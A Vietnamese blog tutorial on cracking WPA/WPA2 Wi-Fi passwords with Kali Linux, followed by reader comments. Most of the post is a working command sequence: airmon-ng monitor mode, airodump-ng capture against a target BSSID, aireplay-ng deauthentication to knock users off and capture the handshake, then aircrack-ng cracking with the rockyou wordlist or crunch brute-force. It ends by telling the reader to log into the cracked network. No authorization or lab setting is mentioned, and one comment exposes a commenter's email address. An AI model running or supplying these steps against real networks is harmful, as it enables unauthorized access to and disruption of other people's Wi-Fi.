FTLinuxCourse - Tin tổng hợp mới nhất không thể bỏ lỡ
  • Home
  • Lập Trình Linux
  • Công Nghệ
  • Máy Tính
No Result
View All Result
  • Home
  • Lập Trình Linux
  • Công Nghệ
  • Máy Tính
No Result
View All Result
FTLinuxCourse - Tin tổng hợp mới nhất không thể bỏ lỡ
No Result
View All Result

Thực hành Crack WI-FI trên Kali Linux

admin by admin
February 13, 2020
in Lập Trình Linux
8
Thực hành Crack WI-FI trên Kali Linux



Tài liệu đầy đủ:

Sử dụng Aircrack-ng để crack mật khẩu Wifi (WPA/WPA2)
Bước 1: Mở Terminal để thực hiện các câu lệnh (tương tự Command Prompt
trong Windows)
• Bước 2: Kiểm tra tên card Wireless đang sử dụng bằng lệnh iwconfig, thông
thường là card wlan0. Nếu card wireless chưa được bật (không thể kết nối wifi)
thì có thể bật bằng lệnh ifconfig wlan0 up
• Bước 3: Chuyển card mạng Wifi sang chế độ monitor (chế độ theo dõi toàn bộ
các tín hiệu trong mạng) bằng airmon-ng.
Kiểm tra tên card Wifi với lệnh iwconfig hay airmon-ng, thông thường là wlan0.
Chuyển card wlan0 sang chế độ monitor bằng công cụ airmon với lệnh:
airmon-ng start wlan0
Lúc này, kiểm tra bằng ifconfig ta sẽ thấy có card wlan0mon
• Bước 4: Sử dụng airodump để theo dõi hoạt động các mạng wifi hiện tại qua
card wlan0mon (card wlan0 ở chế độ monitor)
airodump-ng wlan0mon
• Bước 5: Xác định mạng wifi mục tiêu và sử dụng airodump để bắt gói tin và chỉ
theo dõi duy nhất mạng mục tiêu đó:
airodump-ng -c [channel] -w [tập tin] –bssid [BSSID của mạng] wlan0mon
Ví dụ: airodump-ng -c 9 -w wifi-sniff –bssid C4:6E:1F:F6:34:B8 wlan0mon
Trong đó:
+ Quan sát trường CH để xác định Channel của điểm phát sóng
+ -w [tập tin]: xác định đường dẫn để lưu tập tin bắt được (định dạng .cap)
+ bssid: Xem trường BSSID (địa chỉ MAC của access point)
• Bước 6: Thu thập gói tin bắt tay WPA handshake (bắt tay 4 bước) trong quá trình
đăng nhập để dựa vào đó dò tìm mật khẩu.
Có 2 cách:
+ Chờ người dùng nào đó đăng nhập vào Wifi đang theo dõi.
+ Sử dụng aireplay để tạo tín hiệu deauth (kích các người dùng đang sử dụng mạng
thoát ra và đăng nhập lại liên tục. Cú pháp:
aireplay-ng –deauth [số lệnh deauth] -a [BSSID của mạng] wlan0mon
Ví dụ: aireplay-ng –deauth 5 -a C4:6E:1F:2D:D6:B8 wlan0mon (có thể thay –deauth thành
-0, khi muốn gửi không giới hạn lệnh deauth có thể đặt thông số là 0)
• Bước 7: Thực hiện chờ hoặc dùng aireplay như bước 6 đến khi nhận được gói
tin WPA handshake của mạng mục tiêu tương ứng, ta dừng quá trình bắt gói tin
(Ctrl+C) và tiến hành dò tìm mật khẩu dựa vào file .cap đã bắt được.
Có thể sử dụng phương pháp dò tìm theo Wordlist hay thực hiện Brute-force để dò
tìm mật khẩu.
– Phương pháp dùng Wordlist (danh sách các từ có sẵn)
Trong Kali cung cấp sẵn một số Wordlist thông dụng tại thư mục /usr/share/wordlist. Nổi
bật là wordlist rockyou.txt với thư viện khoảng 10 triệu mật khẩu thông dụng. Ngoài ra, có
thể dùng Crunch để tự tạo Wordlist tùy ý.
Nếu sử dụng Wordlist rockyou.txt có sẵn, ta thực hiện các lệnh sau:
cp /usr/share/wordlists/rockyou.txt.gz /root/Desktop  Copy file nén chứa
rockyou.txt ra Desktop để thuận tiện sử dụng
gzip –d /root/Desktop/rockyou.txt.gz  Giải nén file rockyou.txt.gz
Sau khi đã có file rockyou.txt đã giải nén, sử dụng lệnh sau để dò tìm password:
aircrack-ng -w [đường dẫn file Wordlist] [đường dẫn file .cap đã thiết lập ở bước 5]
Ví dụ: aircrack-ng –w /root/Desktop/rockyou.txt wifi-sniff-01.cap
– Phương pháp kết hợp tool Crunch để brute-force (dò tìm vét cạn) không cần
dùng Wordlist có sẵn
Cú pháp để sử dụng Crunch:
crunch [min] [max] [charset] -t [pattern] -o [path file] với:
 [min]: số kí tự tối thiểu
 [max]: số kí tự tối đa
 [charset]: danh sách kí tự có trong mật khẩu
 [pattern]: mẫu mật khẩu & các ký tự đã biết, ký tự chưa biết ký hiệu %
 [path file]: đừng dẫn file Wordlist được tạo
Thực hiện lệnh với cú pháp như sau:
crunch [min] [max] [danh sách các ký tự có có trong chuỗi] –t [mẫu định dạng mật
khẩu] | aircrack-ng -w- [tập tin đã capture.cap] –bssid [địa chỉ MAC của mục tiêu]
Ví dụ: Dự đoán mật khẩu có 10 ký tự là 1 số điện thoại có đầu số 091, mật khẩu gồm
các số từ 0-9 có thể dò tìm vét cạn tất cả các dãy 091xxxxxxx như sau:
crunch 10 10 0123456789 –t 091%%%%%%% | aircrack-ng –w- wifi-sniff.cap –bssid
C4:6E:1F:2D:D6:B8
Bước 8: Sau khi đã tìm được mật khẩu, tắt chế độ monitor của card wlan0 để có
thể sử dụng lại Wifi bằng lệnh
airmon-ng stop wlan0mon
Dùng mật khẩu vừa dò tim để truy cập thử Wifi

Nguồn:https://ftlinuxcourse.com/

Xem thêm Bài Viết:

  • Trải nghiệm mới hay ho với hướng dẫn cài Mac Os trên vmware
  • Bật mí cách cài đặt ssl miễn phí lên Let’s Encrypt
  • Tuyệt chiêu tạo usb boot kali linux đơn giản dành cho bạn
  • Hướng dẫn chi tiết từ A – Z các bước cài đặt Python trên Windows 10
  • Bật mí quy trình cài đặt Kali Linux trên Vmware đúng chuẩn và chi tiết
Tags: Youtube
Previous Post

Cài đặt bộ Office tốt nhất cho Ubuntu 17.04

Next Post

EXPLAINED : DESKTOP ENVIRONMENTS OF LINUX [KDE/GNOME/XFCE/LXDE]

Next Post
EXPLAINED : DESKTOP ENVIRONMENTS OF LINUX [KDE/GNOME/XFCE/LXDE]

EXPLAINED : DESKTOP ENVIRONMENTS OF LINUX [KDE/GNOME/XFCE/LXDE]

Comments 8

  1. MasterGames Blitz says:
    2 years ago

    hi a, e uit-er nè, e đến đoạn airodump-ng wlan0mon r. cơ mà nó k hiện cái wifi nào hết. Vậy là sao a?
    e chạy kali qua usb á

    Reply
  2. Thien Truong says:
    2 years ago

    Mình gõ airodump-ng wlan0 bị lỗi ioctl (SI0CSIWM0DE) failed: invalid argument và error setting monitor mode on wlan0 và failed initializing wireless card(s): wlan0 . Chỉ mình khắc phục vs

    Reply
  3. Kien Kien says:
    2 years ago

    dò bằng từ điển có hack được mật khẩu wifi bằng chữ không anh?

    Reply
  4. Ung Trần Thanh Đạt says:
    2 years ago

    a ơi cho e hỏi tới bước 7 nếu không dù wordlist hay rockyou thì mình tiến hành chờ đến khi client nhập pass hay s ạ

    Reply
  5. Madz says:
    2 years ago

    Anh có đoạn code dùng để vét cạn bằng python ko ạ?

    Reply
  6. #KrazyBoy says:
    2 years ago

    Phương pháp dò WI-FI kiểu vét cạn này rất tốn thời gian. Nếu muốn nhanh thì mật khẩu phải 8 chữ trở lại 😀 hoặc phải có thư viện mật khẩu ( xác suất dò trúng còn tuỳ vào thư viện).

    Reply
  7. Viet phan hoang says:
    2 years ago

    tại sao lúc mình airodump , đợi gần 10 phút rồi mà vẫn không quét được wifi nào thế bạn ??

    Reply
  8. Dũng Lê says:
    2 years ago

    cho mình xin bản word được không bạn.
    mail: lmdung94@gmail.com

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Xem Thêm

Những điều bạn có thể chưa biết về Thánh sim Hi Vietnamobile

Những điều bạn có thể chưa biết về Thánh sim Hi Vietnamobile

January 17, 2021
Xiaomi Mi 10 Pro thiết kế thời thương, màn hình cong ấn tượng

Xiaomi Mi 10 Pro thiết kế thời thương, màn hình cong ấn tượng

June 1, 2021
Địa chỉ in bao bì nhựa tại Đà Nẵng chiết khấu cao

Địa chỉ in bao bì nhựa tại Đà Nẵng chiết khấu cao

January 26, 2021
Địa chỉ bán đèn tuýp LED Philips uy tín và chất lượng trên thị trường?

Bán đèn tuýp led Philips – Skyled

July 27, 2020
Lựa chọn chủ đề in áo thun phù hợp

Lựa chọn dịch vụ in áo thun cotton cần lưu ý gì?

August 2, 2020
Cần xác định được điểm đặt pallet cao nhất để mua xe

Bí quyết chọn mua xe nâng điện đẩy tay

August 3, 2020

Về Chúng Tôi

Báo ftlinuxcourse.com 24h – Đón xem những tin tức mới nhất về tình hình chính trị, xã hội, an ninh trật tự, văn hóa – giải trí, thể thao, thông tin trong ngày.

  • Liên Hệ
  • Chính Sách Bảo Mật

© 2022 JNews - Premium WordPress news & magazine theme by Jegtheme.

No Result
View All Result
  • Home
  • Lập Trình Linux
  • Công Nghệ
  • Máy Tính

© 2022 JNews - Premium WordPress news & magazine theme by Jegtheme.